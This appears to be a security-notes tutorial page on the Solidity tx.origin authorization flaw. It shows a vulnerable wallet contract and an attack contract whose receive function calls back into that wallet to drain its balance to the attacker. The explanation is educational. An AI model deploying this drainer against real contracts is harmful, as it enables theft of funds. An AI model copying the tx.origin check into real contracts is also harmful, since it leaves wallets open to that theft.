Tx Origin Attack

The Solidity 'tx.origin' should not be used for authorization e.g. when transferring ether to a wallet because tx.origin is the address of EOA (Externallly Owned Account) that the originated the transaction, not the address of caller for the function on the smart contract (this is msg.sender).

Inappropriate User Authorization

Reference: https://docs.soliditylang.org/en/develop/security-considerations.html#tx-origin

// Vulnerable: comparing the contract owner with tx.origin
require(tx.origin == owner)

// Vulnerable: 
require(tx.origin == msg.sender)

1. Vulnerable Wallet

For example, the following wallet validates a user with tx.origin == owner. However, this tx.origin is vulnerable because tx.origin is not

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;

contract VulnWallet {
    address owner;

    constructor() {
        owner = msg.sender;
    }

    function transferTo(address payable _to, uint amount) public {
        require(tx.origin == owner);
        _to.transfer(amount);
    }
}

2. Implement Attack Wallet using the Vulnerable Wallet

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;

interface VulnWallet {
    function transferTo(address payable _to, uint amount) external;
}

contract AttackWallet {
    address payable owner;

    constructor() {
        owner = payable(msg.sender);
    }

    receive() external payable {
        VulnWallet(msg.sender).transferTo(owner, msg.sender.balance);
    }
}

References

PreviousSolidity Storage Values Analysis NextCryptography Basic

Last updated 1 month ago

hashtagInappropriate User Authorization

hashtag1. Vulnerable Wallet

hashtag2. Implement Attack Wallet using the Vulnerable Wallet

hashtagReferences

Inappropriate User Authorization

1. Vulnerable Wallet

2. Implement Attack Wallet using the Vulnerable Wallet

References